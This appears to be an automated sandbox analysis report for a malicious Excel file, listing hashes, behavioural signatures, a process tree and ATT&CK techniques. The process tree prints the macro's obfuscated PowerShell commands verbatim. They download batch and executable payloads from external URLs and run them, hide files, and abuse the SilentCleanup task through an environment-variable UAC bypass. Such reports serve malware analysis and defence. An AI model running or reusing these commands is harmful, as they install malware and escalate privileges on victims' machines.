1c01354cd22e2e101476aeeb6fea291060ff0b536e5761766ba2d7a60facdea6

General

Target

order_receipt.xls
Size

276KB
MD5

66ca579b793dc4367aba256fa62f9bf2
SHA1

deb4047fdd1b203d4202cc716df2d01a35730229
SHA256

1c01354cd22e2e101476aeeb6fea291060ff0b536e5761766ba2d7a60facdea6
SHA512

14ac4a17869bb546b58ace488c9d5d14df7fc3ddeb40b9dd26529bcff132cf6c6fdcd7a601080058f9b51f83528123823f0a413adf7904377480b6cdee5095a6

Score

10^/10

evasion

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cutt.ly/8jmDPVb

Signatures

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3288	4068	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2644	4068	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1816	4068	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2652	4068	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	972	4068	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

22 3552 powershell.exe
23 3552 powershell.exe
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

flow	pid	process
22	3552	powershell.exe
23	3552	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4784 timeout.exe
4828 timeout.exe

pid	process
4784	timeout.exe
4828	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4068 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3552	powershell.exe
3952	powershell.exe
2148	powershell.exe
3976	powershell.exe
3552	powershell.exe
3552	powershell.exe
3828	powershell.exe
3828	powershell.exe
2148	powershell.exe
2148	powershell.exe
3952	powershell.exe
3952	powershell.exe
3552	powershell.exe
3976	powershell.exe
3976	powershell.exe
2148	powershell.exe
3976	powershell.exe
3828	powershell.exe
3952	powershell.exe
3828	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	3828	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

4068 EXCEL.EXE
4068 EXCEL.EXE

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE
4068	EXCEL.EXE

Suspicious use of WriteProcessMemory 38 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.execmd.execmd.exepowershell.exepowershell.execmd.exe

description	pid	process	target process
PID 4068 wrote to memory of 3288	4068	EXCEL.EXE	cmd.exe
PID 4068 wrote to memory of 3288	4068	EXCEL.EXE	cmd.exe
PID 4068 wrote to memory of 2644	4068	EXCEL.EXE	cmd.exe
PID 4068 wrote to memory of 2644	4068	EXCEL.EXE	cmd.exe
PID 4068 wrote to memory of 972	4068	EXCEL.EXE	cmd.exe
PID 4068 wrote to memory of 972	4068	EXCEL.EXE	cmd.exe
PID 4068 wrote to memory of 2652	4068	EXCEL.EXE	cmd.exe
PID 4068 wrote to memory of 2652	4068	EXCEL.EXE	cmd.exe
PID 4068 wrote to memory of 1816	4068	EXCEL.EXE	cmd.exe
PID 4068 wrote to memory of 1816	4068	EXCEL.EXE	cmd.exe
PID 2644 wrote to memory of 3952	2644	cmd.exe	powershell.exe
PID 2644 wrote to memory of 3952	2644	cmd.exe	powershell.exe
PID 3288 wrote to memory of 2148	3288	cmd.exe	powershell.exe
PID 3288 wrote to memory of 2148	3288	cmd.exe	powershell.exe
PID 1816 wrote to memory of 3552	1816	cmd.exe	powershell.exe
PID 1816 wrote to memory of 3552	1816	cmd.exe	powershell.exe
PID 972 wrote to memory of 3976	972	cmd.exe	powershell.exe
PID 972 wrote to memory of 3976	972	cmd.exe	powershell.exe
PID 2652 wrote to memory of 3828	2652	cmd.exe	powershell.exe
PID 2652 wrote to memory of 3828	2652	cmd.exe	powershell.exe
PID 3976 wrote to memory of 4408	3976	powershell.exe	attrib.exe
PID 3976 wrote to memory of 4408	3976	powershell.exe	attrib.exe
PID 3828 wrote to memory of 4704	3828	powershell.exe	cmd.exe
PID 3828 wrote to memory of 4704	3828	powershell.exe	cmd.exe
PID 4704 wrote to memory of 4724	4704	cmd.exe	mode.com
PID 4704 wrote to memory of 4724	4704	cmd.exe	mode.com
PID 4704 wrote to memory of 4748	4704	cmd.exe	cmd.exe
PID 4704 wrote to memory of 4748	4704	cmd.exe	cmd.exe
PID 4704 wrote to memory of 4764	4704	cmd.exe	reg.exe
PID 4704 wrote to memory of 4764	4704	cmd.exe	reg.exe
PID 4704 wrote to memory of 4784	4704	cmd.exe	timeout.exe
PID 4704 wrote to memory of 4784	4704	cmd.exe	timeout.exe
PID 4704 wrote to memory of 4808	4704	cmd.exe	schtasks.exe
PID 4704 wrote to memory of 4808	4704	cmd.exe	schtasks.exe
PID 4704 wrote to memory of 4828	4704	cmd.exe	timeout.exe
PID 4704 wrote to memory of 4828	4704	cmd.exe	timeout.exe
PID 4704 wrote to memory of 4868	4704	cmd.exe	reg.exe
PID 4704 wrote to memory of 4868	4704	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4408 attrib.exe

pid	process
4408	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\order_receipt.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\SYSTEM32\cmd.exe
cmd /c po^wer^she^l^l -w 1 Start-Sleep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 Start-Sleep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\SYSTEM32\cmd.exe
cmd /c po^wer^she^l^l -w 1 Start-Sleep 12; Remove-Item -Path pd.bat -Force
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 Start-Sleep 12; Remove-Item -Path pd.bat -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3952

C:\Windows\SYSTEM32\cmd.exe
cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/8jmDPVb','pd.bat')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/8jmDPVb','pd.bat')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552

C:\Windows\SYSTEM32\cmd.exe
cmd /c po^wer^she^l^l -w 1 Start-Sleep 7;cd "$e`nV:T`EMP; ./pd.bat"
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 Start-Sleep 7;cd "$e`nV:T`EMP; ./pd.bat"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\pd.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:4704

C:\Windows\system32\mode.com
mode 18,1
5⤵
PID:4724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ver
5⤵
PID:4748

C:\Windows\system32\reg.exe
reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://tactlessstarbucks.org/tor/fd.exe',($env:appdata)+'\fd.exe');Start-Sleep 2; Start-Process $env:appdata\fd.exe;&REM "
5⤵
PID:4764

C:\Windows\system32\timeout.exe
timeout /t 2
5⤵
- Delays execution with timeout.exe
PID:4784

C:\Windows\system32\schtasks.exe
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
5⤵
PID:4808

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
- Delays execution with timeout.exe
PID:4828

C:\Windows\system32\reg.exe
reg delete "HKCU\Environment" /v "windir" /F
5⤵
PID:4868

C:\Windows\SYSTEM32\cmd.exe
cmd /c po^wer^she^l^l -w 1 Start-Sleep 1; attrib +s +h pd.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 Start-Sleep 1; attrib +s +h pd.bat
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h pd.bat
4⤵
- Views/modifies file attributes
PID:4408

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

2

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

2

T1158

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9ba18670f936298a7ec95a39d8339cee

SHA1
06b3d32473d2711b08181b3139c2f57643f1f6b2

SHA256
9be1cbb908dc801f20a44c6d17ee838357fa35310f9aca0ca9faff3b7f8740a2

SHA512
10281048fa0f9be74dbc0a54232ce21efe92543695b1778b3a00b214cd6e73f7ef1c5dd74528bb72a83e3132e9f161a50047aeb52d660ce9942e0ee3107e4c7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
fd0a4cf90fe913fb258c99c8448ccd20

SHA1
179be6b462291b3ccfcc75b41c23ce528703a25a

SHA256
63bce8ad012102d8d5410a062f8ea42bedca7d092c21b629312b44663477187f

SHA512
0c8049aa76a3c414108f78620b9821ee99d74e269fdfb189f4789f75349d1b14e2d1b73b9f90291dd639ab8d4746a6ac8376144111b5a9b606d04744304204b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c1ee6b3209e8af9012290d43f40d682b

SHA1
4ea007e2b26a5f85f7ba6f9aa69832f20d63cd14

SHA256
7e77368ef73d3be4db51f179fbfa684948f8578f601db9967273896a571fbb25

SHA512
d140b9a1158372641936298ffcd61a1622bd3e54ffe0a04229d04ce818a727a503642b37a4da3fb2a9d66890655c15b5924374f187cb9b3e4316270d9e272a37

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
36bf663a9285085ad333d2382a636bb5

SHA1
4048a2b39b4f64a1ea032a5c1870c7057e4bbc0d

SHA256
ffdce56a76f181463441055e92a74a483868a535f9b0bfb0d32432776273a635

SHA512
abfba7a714aedc1eb60f2d4bf512cfcc4764f1f2c7c373217a95f8112537de74c971a3b88dd6ffef549730a4d22710ad9a256f8dd28ef3f7b726a07108d849c8

Download Submit
C:\Users\Admin\Documents\pd.bat
MD5
c0f773a3c915b474b0834584b70f2d00

SHA1
14655cf9e2e1ef5d6703910e4ab7b54eb7d023c7

SHA256
937b612dd1267f465a6812433dca1ea4becca1f863d6a3e540d1a3c4bc1b0984

SHA512
24965f8b76d21a9eac0df42508fa331b527ad314cf2d93cdc3f0f152a406bfe498eb22fbad32a178ce303e11d2457898c0d1353d290987254c949f3a7a930f57

Download Submit
memory/972-5-0x0000000000000000-mapping.dmp

Download
memory/1816-7-0x0000000000000000-mapping.dmp

Download
memory/2148-14-0x00007FFED1610000-0x00007FFED1FFC000-memory.dmp

Filesize
9.9MB

Download
memory/2148-10-0x0000000000000000-mapping.dmp

Download
memory/2644-4-0x0000000000000000-mapping.dmp

Download
memory/2652-6-0x0000000000000000-mapping.dmp

Download
memory/3288-3-0x0000000000000000-mapping.dmp

Download
memory/3552-11-0x0000000000000000-mapping.dmp

Download
memory/3552-13-0x00007FFED1610000-0x00007FFED1FFC000-memory.dmp

Filesize
9.9MB

Download
memory/3552-23-0x000001AC438F0000-0x000001AC438F1000-memory.dmp

Filesize
4KB

Download
memory/3552-17-0x000001AC43620000-0x000001AC43621000-memory.dmp

Filesize
4KB

Download
memory/3828-18-0x00007FFED1610000-0x00007FFED1FFC000-memory.dmp

Filesize
9.9MB

Download
memory/3828-16-0x0000000000000000-mapping.dmp

Download
memory/3952-9-0x00007FFED1610000-0x00007FFED1FFC000-memory.dmp

Filesize
9.9MB

Download
memory/3952-8-0x0000000000000000-mapping.dmp

Download
memory/3976-12-0x0000000000000000-mapping.dmp

Download
memory/3976-15-0x00007FFED1610000-0x00007FFED1FFC000-memory.dmp

Filesize
9.9MB

Download
memory/4068-2-0x00007FFED9260000-0x00007FFED9897000-memory.dmp

Filesize
6.2MB

Download
memory/4408-28-0x0000000000000000-mapping.dmp

Download
memory/4704-33-0x0000000000000000-mapping.dmp

Download
memory/4724-34-0x0000000000000000-mapping.dmp

Download
memory/4748-35-0x0000000000000000-mapping.dmp

Download
memory/4764-36-0x0000000000000000-mapping.dmp

Download
memory/4784-37-0x0000000000000000-mapping.dmp

Download
memory/4808-38-0x0000000000000000-mapping.dmp

Download
memory/4828-39-0x0000000000000000-mapping.dmp

Download
memory/4868-41-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads